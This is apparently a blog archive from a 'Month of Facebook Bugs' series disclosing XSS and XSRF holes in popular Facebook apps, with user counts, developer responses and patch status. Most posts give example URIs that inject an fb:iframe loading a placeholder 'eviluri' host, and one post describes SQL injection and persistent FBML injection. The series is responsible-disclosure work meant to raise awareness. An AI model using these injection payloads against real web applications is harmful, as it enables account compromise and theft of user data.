FAXX Hack: My Zoo

Current Monthly Active Users: 953,784

Current Rank on Application Leaderboard: 124

Application Developer: Eyrewood Studios

Responsiveness: I did not direct contact information for the developer, so I forwarded this request to Facebook, and the hole has since been patched.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Hugged

Facebook Verified Application

Current Monthly Active Users: 3,169,974

Current Rank on Application Leaderboard: 51

Application Developer: Manakki

Responsiveness: I did not receive any responses from Manakki, but they did patch the hole – the example URI below now brings up a page that says, “Please go away.”

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: SocialCalendar

Facebook Verified Application

Current Monthly Active Users: 1,661,572

Current Rank on Application Leaderboard: 93

Application Developer: SocialCalendar.com

Responsiveness: I received an e-mail back from SocialCalendar the day after contacting them, and they noted that they take information security seriously.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1

Example POST Request: http://apps.facebook.com/socialcal/?sc_movie_search_type=NAME&sc_movie_search_query=”/><fb:iframe src=”http://eviluri/”>&sc_op=showView&sc_v=movieSearch

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Circle of Friends

Posting these is not an automated process, and I was on the road most of yesterday, so again I apologize for being a day late. This counts as Friday’s FAXX Hack.

Current Monthly Active Users: 635,797

Current Rank on Application Leaderboard: 172

Application Developer: Bantr

Responsiveness: I received an e-mail about a day after reporting the hole to let me know that Bantr had fixed it.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/friendcircles/circle_settings.php?circle_id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Brain Buddies

Facebook Verified Application

Current Monthly Active Users: 4,861,078

Current Rank on Application Leaderboard: 38

Application Developer: wooga – world of gaming

Responsiveness: Wooga did not send any messages, but did patch the hole.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/brainbuddies/?ref=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: NetworkedBlogs

Reported By: Tom Eston

Current Monthly Active Users: 674,027

Current Rank on Application Leaderboard: 164

Application Developer: Ninua, Inc.

Responsiveness: Ninua responded quickly and issued a patch within 24 hours. Furthermore, they went back and scanned all of their pages for holes, then did a second sweep the next week.

Vulnerability Status: Patched

Technical Details:

  1. One could insert FBML into the Link Name field for links in a user’s profile. This code would then be rendered when someone viewed the profile.
  2. At least one page appeared to have a SQL injection hole.  As an example, searching for \’test producing a lengthy SQL error.
  3. One page,  http://apps.facebook.com/blognetworks/userpage.php, was vulnerable to both SQL injection and XSS by inserting text into the uid parameter, such as \<img src=””>.

Notes: This is the first example of a persistent XSS hole in a Facebook application that I became aware of, and full credit for the find goes to security researcher Tom Eston, one of the main people behind SocialMediaSecurity.com.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

Minor Changes to the Month of Facebook Bugs

For the second half of the FAXX Hacks series, I will be making two changes. First, I will no longer indicate whether a vulnerability is also susceptible to clickjacking installs. This project has taken a good deal of volunteered time, and I’ve already shown that over half of the first 15 vulnerabilities could be used with clickjacking.

Second, the example URIs for the next 15 applications will simply demonstrate inserting an fb:iframe tag. Working out the details of the full double-injection trick I’ve previously demonstrated usually takes considerably more time than checking for clickjacking, and thus far has nearly always been possible. When I release demonstration attack code in October, I also plan on giving a more thorough explanation of the double-injection technique.

Thanks for reading and I hope you enjoy the rest of the series – if you think the first half exhausted all the applications with large userbases, think again.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

The Month of Facebook Bugs Halfway Report

A few weeks ago, I announced my plan to post a series of FAXX (Facebook Application XSS+XSRF) hacks. In the spirit of previous series of vulnerability disclosures, I elected to post a new hole every day for the month of September. The effort quickly became known as the Month of Facebook Bugs, and today marks the halfway point.

Thus far, counting the “Make a Gift!” vulnerability as affecting one application, I’ve reported on 19 vulnerable applications, and all but one are patched. Of those 19 applications, 12 are Facebook Verified Applications, and 13 are capable of clickjacking installs. All types of applications have appeared in the series so far, with several coming from the top 10 by monthly active users. Ignoring any overlap and simply totaling all of the monthly active user figures from the 19 reports, the tally of vulnerable users would stand at just over 169 million. However, an application vulnerability affects any user who has ever authorized the application, regardless of how often they use it. Furthermore, a user who has not authorized an application is still susceptible to a clickjacking install.

The primary purposes of this series is to raise awareness – and with several audiences. First, many Facebook users apply the same level of trust to Facebook applications that they give to Facebook itself, and are completely unaware of application-based attacks or the prevalence of application vulnerabilities. Second, many application developers are overlooking basic security practices for web applications. Third, the technology community has not always seemed to realize the magnitude of issues present in the Facebook Platform today.

In fact, while I may ensure that 30 applications get patched, if a 31st remains vulnerable, users remain vulnerable. I’ve outlined before some of the problem I see in the architecture of the Platform, and I’ve sent those concerns to Facebook in communicating with them about these application holes. I’ve not received a response thus far, and honestly don’t expect one, but I do hope this month-long series helps illustrate more vividly why I’ve raised such concerns.

As of today, I have uncovered enough FAXX hacks to last through the rest of September. I’ve already made an effort to contact every developer affected to give them time for patches. Once the month ends, I plan on releasing source code that demonstrates how a FAXX hack can be exploited to steal profile information and launch viral attacks. In the mean time, thanks to everyone for help and feedback – and please keep spreading the word.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 10 11 12 13 14 22